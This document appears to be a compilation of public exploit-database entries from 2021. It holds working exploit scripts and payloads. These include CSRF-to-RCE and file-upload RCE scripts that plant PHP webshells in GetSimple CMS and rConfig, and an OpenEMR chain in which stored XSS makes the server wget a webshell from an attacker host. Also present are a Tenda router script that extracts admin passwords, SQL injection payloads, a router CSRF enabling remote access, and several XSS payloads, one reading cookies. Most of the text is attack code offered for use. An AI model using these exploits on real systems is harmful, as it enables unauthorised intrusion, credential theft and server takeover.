ISHACK AI BOT

# Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE # Exploit Author: Bobby Cooke (boku) # Date: 15/04/2021 # Vendor Homepage: http://get-simple.info # Software Link: http://get-simple.info/extend/download.php?file=files/18274/1221/my-smtp-contact_1.1.1.zip&id=1221 # Vendor: NetExplorer # Version: <= v1.1.1 # Tested against Server Host: Windows 10 Pro + XAMPP # Tested against Client Browsers: Firefox # About My SMTP Contact Plugin: # An authenticated admin of the GetSimple CMS application, who has implemented the My SMTP Contact plugin, can navigate to the plugins configuration page within the admin console, and configure the settings for the SMTP form. The purpose of this plugin is to enable webpages of the CMS to host a contact form, where users of the application will be able to submit requests to the owner. These requests will be sent to the owner via SMTP email. # CSRF Vulnerability Information: # The GetSimple CMS application does not utilize the SameSite flag for the session cookie, and instead uses a CSRF token "nonce" to protect against cross-site attacks. Version of the My SMTP Contact plugin v1.1.1 and before do not implement the CSRF token. The vendor was contacted March 28th 2021, and released v1.1.2 in response, which remediates this vulnerability by implementing the CSRF "nonce" token. # PHP Code Injection Vulnerability Information: # When the administrator configures the SMTP settings, the backend PHP code of the plugin injects the admins user input into PHP code files. These user supplied values are injected into PHP strings which use double quotes. Some features of PHP double quote strings are that variables can be expanded within the strings, and variables enclosed in {} braces will attempt to evaluate complex expressions; resulting in code execution. The method in this proof of concept also overcomes the developers attempt to sanitize the user input by using htmlspecialchars() which removes "'<> and other dangerous characters. The developer received full disclosure of this vulnerability. A simple way to remediate this issue, would be to inject the user supplied input into single quote strings, versus the double quote strings. As single quote strings do not permit variable expansion and complex expression evaluation. # Exploit Description: # The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. # CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H # CVSS Base Score: 9.6 import argparse,requests from http.server import BaseHTTPRequestHandler, HTTPServer from colorama import (Fore as F, Back as B, Style as S) from threading import Thread from time import sleep FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT def bullet(char,color): C=FB if color == 'B' else FR if color == 'R' else FG return SB+C+'['+ST+SB+char+SB+C+']'+ST+' ' info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G') class theTHREADER(object): def __init__(self, interval=1): self.interval = interval thread = Thread(target=self.run, args=()) thread.daemon = True thread.start() def run(self): run() def webshell(target): try: websh = "{}/webshell.php".format(target) term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST) author = '{}{}]{}+++{}[{}========>{} Pwnage Provider : Bobby Cooke {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST) print(author) while True: specialmove = input(term) command = {'FierceGodKick': specialmove} r = requests.post(websh, data=command, verify=False) status = r.status_code if status != 200: r.raise_for_status() response = r.text print(response) except: pass def generateCsrfPayload(): payload = '<body><form action="'+target+'/admin/load.php?id=my-smtp-contact" method="POST">' payload += '<input type="hidden" name="act" value="addsettings">' payload += '<input type="hidden" name="m_smtp_c_language" value="en.php">' payload += '<input type="hidden" name="m_smtp_c_email_to" value="boku@0xboku">' payload += '<input type="hidden" name="m_smtp_c_smtp_or_standard" value="standard">' payload += '<input type="hidden" name="m_smtp_c_digital_captcha" value="on">' payload += '<input type="hidden" name="m_smtp_c_digitSalt" value="TLGfUrl3TyiaxOKwrg5d0exfBYKbHDwR">' payload += '<input type="hidden" name="m_smtp_c_agree_checkbox" value="on">' payload += '<input type="hidden" name="m_smtp_c_client_server" value="client_server">' payload += '<input type="hidden" name="m_smtp_c_window_msg" value="on">' payload += '<input type="hidden" name="m_smtp_c_default_css" value="on">' payload += '<input type="hidden" name="m_smtp_c_sender_name" value="boku">' payload += '<input type="hidden" name="m_smtp_c_subject" value="RCE">' payload += '<input type="hidden" name="m_smtp_c_email_from" value="boku@0xboku">' payload += '<input type="hidden" name="m_smtp_c_email_from_password" value="password123">' payload += '<input type="hidden" name="m_smtp_c_email_from_ssl" value="ssl://smtp.0xboku">' payload += '<input type="hidden" name="m_smtp_c_email_from_port" value="777">' payload += '<input type="hidden" name="m_smtp_c_standard_email_from" value="boku@0xboku">' payload += '<input type="hidden" name="my_smtp_c_selected_dir" value="62605e65e25ab30">' payload += '<input type="hidden" name="my_smtp_c_selected_name" value="asd">' payload += '<input type="hidden" name="m_smtp_c_alternative_fields" value="off">' payload += '<input type="hidden" name="m_smtp_c_qty_fields" value="1">' payload += '<input type="hidden" name="m_smtp_c_limit_file_size" value="1">' payload += '<input type="hidden" name="m_smtp_c_valid_file_format" value="jpeg">' payload += '<input type="hidden" name="m_smtp_c_arr_fields_Name[]" value="User name">' payload += '<input type="hidden" name="m_smtp_c_arr_fields_Name_ok[]" value="ok">' payload += '<input type="hidden" name="m_smtp_c_arr_tags_Name[]" value="0">' payload += '<input type="hidden" name="m_smtp_c_arr_fields_Required[]" value="required">' payload += '<input type="hidden" name="m_smtp_c_arr_fields_Type[]" value="text">' payload += '<input type="hidden" name="m_smtp_c_arr_fields_Maxlength[]" value="50">' payload += '<input type="hidden" name="m_smtp_c_arr_fields_Code[]" value="{$m_smtp_c_qty_fields[shell_exec($_REQUEST[solarflare])]}">' payload += '<input type="submit" value="Submit request">' payload += '</form><body>' return payload class S(BaseHTTPRequestHandler): def do_GET(self): victim = self.client_address victim = "{}:{}".format(victim[0],victim[1]) print("{} connected to Malicious CSRF Site!".format(victim)) self.wfile.write("{}".format(generateCsrfPayload()).encode('utf-8')) def run(server_class=HTTPServer, handler_class=S, port=80): server_address = ('', port) httpd = server_class(server_address, handler_class) banner = '{}{}GetSimpleCMS My SMTP Contact Plugin v1.1.1 - CSRF to RCE{}'.format(SB,FR,ST) print(banner) print('Listening for Victims to connect..') try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print('Stopping httpd...') # Attempts to exploit the Blind RCE of the PHP Code Injection from the CSRF attack to upload a PHP webshell def tryUploadWebshell(target,contact): try: blind = target+contact # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt) webshUpload = {'solarflare': "echo ^<?php echo shell_exec($_REQUEST['FierceGodKick']) ?^>>webshell.php"} requests.post(url=blind, data=webshUpload, verify=False) except: pass def checkWebshell(target): try: websh = "{}/webshell.php".format(target) capsule = {'FierceGodKick':'pwnt?'} resp = requests.post(url=websh, data=capsule, verify=False) return resp.status_code except: pass def argsetup(): about = SB+FT+'The My SMTP Contact v1.1.1 plugin for GetSimple CMS suffers from a CSRF & PHP Code Injection vulnerabilities that when chained together, allow remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. ' about += FR+'CVSS Base Score: 9.6 | ' about += 'CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+ST parser = argparse.ArgumentParser(description=about) parser.add_argument('TargetSite',type=str,help='The routable domain name of the target site') parser.add_argument('SMTPContactPage',type=str,help='The path to the public page which implements the SMTP Contact form - Used for blind RCE') args = parser.parse_args() return args if __name__ == '__main__': args = argsetup() target = args.TargetSite contact = args.SMTPContactPage threadshed = theTHREADER() pwnt = checkWebshell(target) if pwnt != 200: while pwnt != 200: sleep(3) tryUploadWebshell(target,contact) sleep(2) pwnt = checkWebshell(target) print("{} Triggered the Blind RCE and caught a wild webshell!".format(ok)) webshell(target)

# Exploit Title: Fast PHP Chat 1.3 - 'my_item_search' SQL Injection # Date: 15/04/2021 # Exploit Author: Fatih Coskun # Vendor Homepage: https://codecanyon.net/item/fast-php-chat-responsive-live-ajax-chat/10721076 # Version: 1.3 # Category: Webapps # Tested on: Kali linux # Description : The vulnerability allows an attacker to inject sql commands from search section with 'my_item_search' parameter. ==================================================== # PoC : SQLi : POST /chat/edit.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/chat/edit.php Cookie: PHPSESSID=9a04fe702b8ff82c1199590d7c286e1c; _ga=GA1.2.1275939122.1527132107; _gid=GA1.2.1709883568.1527132107 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 40 my_item_search=test&submit_search=Search Parameter : my_item_search Type : boolean-based blind Demo : https://localhost/chat/edit.php Payload : my_item_search=-2454' OR 6122=6122#&submit=Search Type : error-based Demo : https://localhost/chat/edit.php Payload : my_item_search=test' AND (SELECT 3274 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(3274=3274,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hbeW&submit=Search Type : stacked queries Demo : https://localhost/chat/edit.php Payload : my_item_search=test';SELECT SLEEP(5)#&submit=Search Type : AND/OR time-based blind Demo : https://localhost/login-script-demo/users.php Payload : my_item_search=test' OR SLEEP(5)-- mlod&submit=Search Type : UNION query Demo : https://localhost/chat/edit.php Payload : my_item_search=test' UNION ALL SELECT NULL,CONCAT(0x71706a7071,0x4c5a6241667667676e4f6658775348795675704b557871675a5542646273574e5359776668534a71,0x7162716b71),NULL,NULL,NULL,NULL#&submit=Search ====================================================

# Exploit Title: Multilaser Router RE018 AC1200 - Cross-Site Request Forgery (Enable Remote Access) # Date: 14/04/2021 # Exploit Author: Rodolfo Mariano # Version: Firmware V02.03.01.45_pt # CVE: 2021-31152 # Exploit Code: <html> <body> <form action="http://192.168.0.1/goform/setSysTools" method="POST"> <input name="module4" value="remoteWeb" type="hidden"> <input name="remoteWebType" value="any" type="hidden"> <input name="remoteWebIP" value="" type="hidden"> <input name="remoteWebPort" value="8888" type="hidden"> <input type="submit" value="Submit request"> </form> <script> document.forms[0].submit(); </script> </body> </html>

# Exploit Title: WordPress Plugin RSS for Yandex Turbo 1.29 - Stored Cross-Site Scripting (XSS) # Date: 17/04/2021 # Exploit Author: Himamshu Dilip Kulkarni # Software Link: https://wordpress.org/plugins/rss-for-yandex-turbo/ # Version: 1.29 # Tested on: Windows #Steps to reproduce vulnerability: 1. Install WordPress 5.6 2. Install and activate "RSS for Yandex Turbo" plugin. 3. Navigate to Setting >> Яндекс.Турбо >> Счетчики and enter the data into all the six user input field and submit the request. 4. Capture the request into burp suite and append the following mentioned JavaScript payloads (one payload per parameter) "+onmouseover="alert(1) "+onmouseover="alert(2) "+onmouseover="alert(3) "+onmouseover="alert(4) "+onmouseover="alert(5) "+onmouseover="alert(6) 5. You will observe that the payloads got successfully stored into the database and when you move the mouse cursor over these fields the JavaScript payloads get executed successfully and we get a pop-up.

# Exploit Title: BlackCat CMS 1.3.6 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 04/07/2021 # Exploit Author: Ömer Hasan Durmuş # Vendor Homepage: https://blackcat-cms.org/ # Software Link: https://blackcat-cms.org/page/download.php # Version: BlackCat CMS - 1.3.6 Step 1 : Login to admin account in http://TARGET/backend/start/index.php Step 2 : Then click on the "Addons" Step 3 : Click on "Create new" Step 4 : Input "<script>alert(1)</script>" in the field "Module / language name" Step 5 : Update or visit new page. Step 1 : Login to admin account in http://TARGET/backend/start/index.php Step 2 : Then click on the "Access" Step 3 : Click on "Manage groups" Step 4 : Input "<script>alert(1)</script>" in the field "Group name" and click "Add group" Step 5 : Update or visit new page.

# Exploit Title: RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS) # Exploit Author: nu11secur1ty # Debug: g3ck0dr1v3r # Date: 04/21/2021 # Vendor Homepage: https://remoteclinic.io/ # Software Link: https://github.com/remoteclinic/RemoteClinic # CVE: CVE-2021-30044 [+] Exploit Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-30044 [Exploit Program Code] #!/usr/bin/python3 # Author: @nu11secur1ty # Debug: g3ck0dr1v3r # CVE-2021-30044 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link="http://localhost/RemoteClinic/login/" #enter your login username username="[email protected]" #enter your login password password="remoteclinic" #enter the element for username input field element_for_username="user_id" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="submit" # Dai brauzura aaa ta eba browser = webdriver.Chrome() #uncomment this line,for chrome users #browser = webdriver.Firefox() #uncomment this line,for chrome users #browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver] # Otvarai da ne vlazam s kasata browser.get((website_link)) # Run... try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = browser.find_element_by_name(element_for_password) password_element.send_keys(password) ### Login signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() ### Exploit element_for_natrutvanie="submit" browser.get(("http://localhost/RemoteClinic/staff/register.php")) ### Inner text... browser.execute_script("document.querySelector('[name=\"first_name\"]').value = '<img src=1 onerror=alert(`Please_fix_it`)>'") browser.execute_script("document.querySelector('[name=\"last_name\"]').value = '<img src=1 onerror=alert(`Please_fix_it`)>'") browser.execute_script("document.querySelector('[name=\"userid\"]').value = '[email protected]'") browser.execute_script("document.querySelector('[name=\"passkey\"]').value = 'password'") browser.execute_script("document.querySelector('[name=\"contact\"]').value = '123456789'") browser.execute_script("document.querySelector('[name=\"mobile\"]').value = '12345678910'") browser.execute_script("document.querySelector('[name=\"skype\"]').value = 'nu11secur1ty'") browser.execute_script("document.querySelector('[name=\"address\"]').value = 'Kurec A 31'") browser.find_element_by_name('image').send_keys("C:\\Users\\nu11secur1ty\\Desktop\\CVE\\CVE-2021-30044\\nu11secur1ty.png") time.sleep(5) # Submit exploit signInButton = browser.find_element_by_name(element_for_natrutvanie) signInButton.click() # Maani sa i testwai posle time.sleep(1) browser.get(("http://localhost/RemoteClinic/login/signout.php")) browser.close() print("payload is deployed...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(")

# Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2) # Exploit Author: Vishwaraj Bhattrai # Date: 18/04/2021 # Vendor Homepage: https://www.rconfig.com/ # Software Link: https://www.rconfig.com/ # Vendor: rConfig # Version: <= v3.9.6 # Tested against Server Host: Linux+XAMPP import requests import sys s = requests.Session() host=sys.argv[1] #Enter the hostname cmd=sys.argv[2] #Enter the command def exec_cmd(cmd,host): print "[+]Executing command" path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd) response=requests.get(path) print response.text print "\n[+]You can access shell via below path" print path def file_upload(cmd,host): print "[+]Bypassing file upload" burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"} burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""} burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n<?php $cmd=$_GET['x'];system($cmd);?>\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n" requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data) exec_cmd(cmd,host) def login(host,cmd): print "[+]Logging in" burp0_url = "https://"+host+":443/lib/crud/userprocess.php" burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"} burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data) file_upload(cmd,host) login(host,cmd)

# Exploit Title: Tenda D151 & D301 - Configuration Download (Unauthenticated) # Date: 19-04-2021 # Exploit Author: BenChaliah # Author link: https://github.com/BenChaliah # Vendor Homepage: https://www.tendacn.com # Software Link: https://www.tendacn.com/us/download/detail-3331.html # Versions: # - D301 1.2.11.2_EN # - D301 V2.0 50.22.1.8_EN # - D151 V2.0 50.21.1.5_EN # --- Description --- # # This exploits allows for the download of the current router config including the admin login, just by requesting {IP}/goform/getimage, # you can also activate telnet service by requesting /goform/telnet. Telnet activation issue exists in many other tenda devices too. # --- Proof of concept --- # import struct import itertools import random, sys import requests import base64 FETCH_CODE = "\x80\x0f\x07\xe7\x83i\xb0@v2\x9c\x8ef\x93y\xb8z" ADMIN_LOG_CFG = {'AdminPassword': 'admin', 'SupportPassword': 'support'} CLEAR_CODE = 256 END_OF_CODE = CLEAR_CODE + 1 MIN_WIDTH = 8 DEFAULT_MIN_BITS = MIN_WIDTH + 1 DEFAULT_MAX_BITS = 12 def cmsDecoder(compressed_cfg): _cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256)) _cp_dict[CLEAR_CODE] = CLEAR_CODE _cp_dict[END_OF_CODE] = END_OF_CODE prefix, offset, ignore = None, 0, 0 codepoints_arr, remainder, bits = [], [], [] init_csize = len(_cp_dict) codesize = init_csize minwidth = MIN_WIDTH while (1 << minwidth) < codesize: minwidth = minwidth + 1 pointwidth = minwidth buts_arr = [] for b in compressed_cfg: value = struct.unpack("B", b)[0] for bitplusone in range(8, 0, -1): bitindex = bitplusone - 1 buts_arr.append(1 & (value >> bitindex)) for nextbit in buts_arr: offset = (offset + 1) % 8 if ignore > 0: ignore = ignore - 1 continue bits.append(nextbit) if len(bits) == pointwidth: cp_int = 0 lsb_first = [b for b in bits] lsb_first.reverse() for bit_index in range(len(lsb_first)): if lsb_first[bit_index]: cp_int = cp_int | (1 << bit_index) bits = [] codepoints_arr.append(cp_int) codesize = codesize + 1 if cp_int in [CLEAR_CODE, END_OF_CODE]: codesize = init_csize pointwidth = minwidth else: while codesize >= (2 ** pointwidth): pointwidth = pointwidth + 1 if cp_int == END_OF_CODE: ignore = (8 - offset) % 8 decodedBytes = [] for cp_int in codepoints_arr: suffix = "" if cp_int == CLEAR_CODE: _cp_dict = dict((pt, struct.pack("B", pt)) for pt in range(256)) _cp_dict[CLEAR_CODE] = CLEAR_CODE _cp_dict[END_OF_CODE] = END_OF_CODE prefix = None elif cp_int != END_OF_CODE: if cp_int in _cp_dict: suffix = _cp_dict[cp_int] if None != prefix: _cp_dict[len(_cp_dict)] = prefix + suffix[0] else: suffix = prefix + prefix[0] _cp_dict[len(_cp_dict)] = suffix prefix = suffix decoded = suffix for char in decoded: decodedBytes.append(char) return decodedBytes def exploit(ip): print "[!] Downloading config" try: r = requests.get("http://{}/goform/getimage".format(ip)) pass except: print "[-] Failed to download the config, the target may not be vulnerable" BIN_CONTENT = r.content BIN_CONTENT = BIN_CONTENT[BIN_CONTENT.index(FETCH_CODE):][:16*50] CONFIG_XML = b"".join(cmsDecoder(BIN_CONTENT)) USER_, PASS_ = "", "" for i in ADMIN_LOG_CFG.keys(): if i in CONFIG_XML: CONFIG_XML = CONFIG_XML[CONFIG_XML.index(i) + len(i) + 1:] PASS_ = CONFIG_XML[:CONFIG_XML.index('</')] USER_ = ADMIN_LOG_CFG[i] print "\tusername: {}\n\tpassword: {}\n".format(USER_, base64.b64decode(PASS_).rstrip('\x00')) return 0 print "[-] Failed to decode the config file\n" return -1 if len(sys.argv) == 1: print "usage: python2 " + sys.argv[0] + " router_ip" print "example: python2 exploit.py http://192.168.1.1" exit() if __name__ == "__main__": print """\ _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -- By BenCh@li@h | D _]/\ \ -- BenChaliah@github \___/ / /\ \\ (_ )( _) """ try: exploit(sys.argv[1]) except Exception as e: print str(e)

# Exploit Title: OpenEMR 5.0.2.1 - Remote Code Execution # Exploit Author: Hato0, BvThTrd # Date: 2020-08-07 # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://sourceforge.net/projects/openemr/files/OpenEMR%20Current/5.0.2.1/openemr-5.0.2.tar.gz/download # Version: 5.0.2.1 (without patches) # Tested on: Ubuntu Server 20.04.1 LTS, OpenEMR Version 5.0.2.1 # References: # https://blog.sonarsource.com/openemr-5-0-2-1-command-injection-vulnerability?utm_medium=cpc&utm_source=twitter&utm_campaign=openemr&utm_term=security&utm_content=tofu # https://www.youtube.com/watch?v=H8VWNwWgYJo&feature=emb_logo #!/usr/bin/python3 WARNING=''' ===================================== WARNING ===================================== Please do not use for illegal purposes. It's for educational use only. Please be on the good side. =================================================================================== ''' import argparse import http.server import socketserver import requests from termcolor import colored import json OPENEMR_DIR = "" RHOST = "127.0.0.1" RPORT = 80 VHOST = "" LHOST = "127.0.0.1" LPORT = 4444 WPORT = 8080 def main(): print(colored(WARNING, "red")) arguments() cookie1, cookie2 = init_session() jsonReceived, id = get_api(cookie1["OpenEMR"], cookie2["PortalOpenEMR"]) write_payload_js() write_wshell() send_xss(id,cookie1["OpenEMR"], cookie2["PortalOpenEMR"], jsonReceived) if len(VHOST) > 0 : print(colored("[+]", "green"),f'Your wshell is available at http://{VHOST}/{OPENEMR_DIR}interface/main/wshell.php?cmd=') else: print(colored("[+]", "green"),f'Your wshell is available at http://{RHOST}:{RPORT}/{OPENEMR_DIR}interface/main/wshell.php?cmd=') web_serv() def arguments(): parser = argparse.ArgumentParser(description='This exploit drop a web shell on an OpenEMR v5.0.2.1 CMS. At the end, GET the URL and run a netcat listener on the LHOST:LHPORT. You will be able to do a Remote Code Execution on this server.') parser.add_argument("-d", "--directory", dest='directory', nargs='?', help="Root directory OpenEMR CMS") parser.add_argument("-rh", "--rhost", dest='rhost', help="Remote server IP", required=True) parser.add_argument("-rp", "--rport", dest='rport', nargs='?', help="Remote server PORT", type=int) parser.add_argument("-vh", "--vhost", dest='vhost', nargs='?', help="Remote server DOMAIN_NAME") parser.add_argument("-lh", "--lhost", dest='lhost', help="Reverse shell IP", required=True) parser.add_argument("-lp", "--lport", dest='lport', help="Reverse shell PORT", type=int, required=True) parser.add_argument("-wp", "--wport", dest='wport', nargs='?', help="Web Server PORT", type=int) args = parser.parse_args() if(args.directory != None): global OPENEMR_DIR OPENEMR_DIR = str(args.directory) if OPENEMR_DIR[-1] != "/": OPENEMR_DIR += "/" if(args.rhost != None): global RHOST RHOST = str(args.rhost) if(args.rport != None): global RPORT RPORT = int(args.rport) if(args.vhost != None): global VHOST VHOST = str(args.vhost) if(args.lhost != None): global LHOST LHOST = str(args.lhost) if(args.lport != None): global LPORT LPORT = int(args.lport) if(args.wport != None): global WPORT WPORT = int(args.wport) def init_session(): r = requests.get(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}interface/login/login.php?site=default', headers={'host': VHOST}) if (r.status_code != 200): print(colored("[-]", "red"),f'An error occured : {r.status_code} ==>\n{r.text}') exit(1) else: print(colored("[+]", "green"),f'Successfully set Session_Regsiter=true with cookie OpenEMR:{r.cookies["OpenEMR"]}') cookies = {"OpenEMR" : r.cookies["OpenEMR"]} r = requests.get(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}portal/account/register.php', headers={'host': VHOST}, cookies=cookies) if (r.status_code != 200): print(colored("[-]", "red"),f'An error occured : {r.status_code} ==>\n{r.text}') exit(1) else: print(colored("[+]", "green"),f'Successfully set Session_Regsiter=true with cookie PortalOpenEMR:{r.cookies["PortalOpenEMR"]}') cookies2 = {"PortalOpenEMR": r.cookies["PortalOpenEMR"]} return (cookies, cookies2) def get_api(cookieEMR, cookiePortal): cookies = {"OpenEMR" : cookieEMR, "PortalOpenEMR": cookiePortal} r = requests.get(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}portal/patient/api/users/', headers={'host': VHOST}, cookies=cookies) parsed_json = (json.loads(r.text)) for row in parsed_json['rows']: if row['authorized'] == str(1): print(colored("[+]", "green"),f'Find admin :') print(colored('\t[*]', 'yellow'), f'Id = {row["id"]}') print(colored('\t[*]', 'yellow'), f'Username = {row["username"]}') print(colored('\t[*]', 'yellow'), f'lname = {row["lname"]}') print(colored('\t[*]', 'yellow'), f'fname = {row["fname"]}') id = row['id'] json_to_return = row if (r.status_code != 200): print(colored("[-]", "red"),f'An error occured : {r.status_code} ==>\n{r.text}') exit(1) else: return (json_to_return, id) def write_payload_js(): payload = "var xmlHttp = new XMLHttpRequest();\n" payload += "var token = window.location.href;\n" if len(VHOST) > 0 : payload += "var mainUrl = 'http://{0}/{1}interface/main/tabs/main.php?token_main=';\n".format(VHOST, OPENEMR_DIR) payload += "var backUrl = 'http://{0}/{1}interface/main/backup.php';\n".format(VHOST,OPENEMR_DIR) else: payload += "var mainUrl = 'http://{0}:{1}/{2}interface/main/tabs/main.php?token_main=';\n".format(RHOST, RPORT, OPENEMR_DIR) payload += "var backUrl = 'http://{0}:{1}/{2}interface/main/backup.php';\n".format(RHOST, RPORT, OPENEMR_DIR) payload += "var cookieSet = 'OpenEMR=';\n\n" payload += "token = token.split('=')[1];\n\n" payload += "xmlHttp.open( 'GET', backUrl, false );\n" payload += "xmlHttp.send(null);\n\n" payload += "var response = xmlHttp.responseText;\n" payload += "var elemHTML = response.split(' ');\n" payload += "var csrf = '';\n\n\n" payload += "for(var i=0; i < elemHTML.length; i++)\n" payload += "{\n" payload += "\t if(elemHTML[i] == 'name=\"csrf_token_form\"')\n" payload += "\t {\n" payload += "\t\t csrf = elemHTML[i+1].split('=')[1].replace(/\"/g,'');\n" payload += "\t\t break;\n" payload += "\t }\n" payload += "}\n\n\n" payload += "var formData = new FormData();\n\n" payload += "formData.append('csrf_token_form', csrf);\n" payload += "formData.append('form_sel_lists[]', 'amendment_status');\n" payload += "formData.append('form_sel_layouts[]', '`wget http://{0}:{1}/wshell.php -O wshell.php;`');\n".format(LHOST,WPORT) payload += "formData.append('form_step', '102');\n" payload += "formData.append('form_status', '');\n\n" payload += "var request = new XMLHttpRequest();\n" payload += "request.open('POST', backUrl);\n" payload += "request.send(formData);\n" with open('payload.js','w') as fpayload: for line in payload: fpayload.write(line) fpayload.close() print(colored("[+]", "green"),f'Payload XSS written') def write_wshell(): with open('wshell.php','w') as fwshell: fwshell.write("<?php system($_GET['cmd']); ?>\n") fwshell.close() print(colored("[+]", "green"),f'Wshell written') def send_xss(id, cookieEMR, cookiePortal, jsonData): cookies = {"OpenEMR" : cookieEMR, "PortalOpenEMR": cookiePortal} jsonData["lname"] = "<script src='http://{0}:{1}/payload.js'> </script>".format(LHOST,WPORT) jsonData["cpoe"] = 1 jsonData["source"] = 1 jsonData.pop("id",None) data = json.dumps(jsonData, indent = 4) r = requests.put(f'http://{RHOST}:{RPORT}/{OPENEMR_DIR}portal/patient/api/user/{id}', headers={'host': VHOST}, cookies=cookies, data=data) print(colored("[+]", "green"),f'Stored XSS dropped') def web_serv(): Handler = http.server.SimpleHTTPRequestHandler with socketserver.TCPServer(("", WPORT), Handler) as httpd: print(colored("[+]", "green"),f'HTTP Simple Server running at localhost PORT {WPORT}') httpd.serve_forever() if __name__ == "__main__": main()

# Exploit Title: Adtran Personal Phone Manager 10.8.1 - 'emailAddress' Stored Cross-Site Scripting (XSS) # Date: 1/21/2021 # Exploit Author: 3ndG4me # Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home # Version: v10.8.1 # Tested on: NetVanta 7060 and NetVanta 7100 # CVE : CVE-2021-25679 # CVE-2021-25679 - Adtran Personal Phone Manager Authenticated Stored XSS in Change Email Address Form --Summary-- The AdTran Personal Phone Manager software is vulnerable to an authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research ADTRAN, Inc https://adtran.com --Affects-- - AdTran Personal Phone Manager - Verified on v10.8.1 - **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended impacted users update to an actively supported appliance. --Details-- The AdTran Personal Phone Manager software is vulnerable to an authenticated stored cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. These issues work by passing in a basic XSS payload to vulnerable POST parameters that are rendered in the output without saniztization. Since the forms do require authentication to access these issues cannot be exploited without credentials. This can allow for several issues including but not limited to: - Hijacking another user's session - Modifying a user's configuration settings - Using XSS payloads to capture input (keylogging) -- Proof of Concept -- The following form was impacted and can be exploited with the sample payloads provided below: - https://example.com/userapp/userSettingsAction.html - POST - formAction=changeEmailAddress&emailAddress=+data%22%3E%3Cscript%3Ealert%`document.cookie`60%3C%2Fscript%3E+&emailAddress2=&emailApply=Apply+Changes The vulnerable parameters that were identified are: - emailAddress - emailAddress2 